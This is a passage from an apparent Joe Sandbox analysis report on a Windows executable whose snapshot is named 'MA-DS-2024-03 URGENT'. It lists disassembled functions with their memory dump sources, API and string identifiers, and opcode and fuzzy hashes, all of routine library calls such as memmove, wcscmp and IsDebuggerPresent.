                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Variant$Init$ClearCopy_memmove
                                                        • String ID: d}K
                                                        • API String ID: 2932060187-3405784397
                                                        • Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                        • Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
                                                        • Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                        • Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54
                                                        Function 00464F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp
                                                        • String ID: #32770
                                                        • API String ID: 2292705959-463685578
                                                        • Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                        • Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
                                                        • Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                        • Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5
                                                        Function 0043B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
                                                          • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
                                                        Strings
                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                        • API String ID: 3158253471-631824599
                                                        • Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                        • Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
                                                        • Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                        • Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9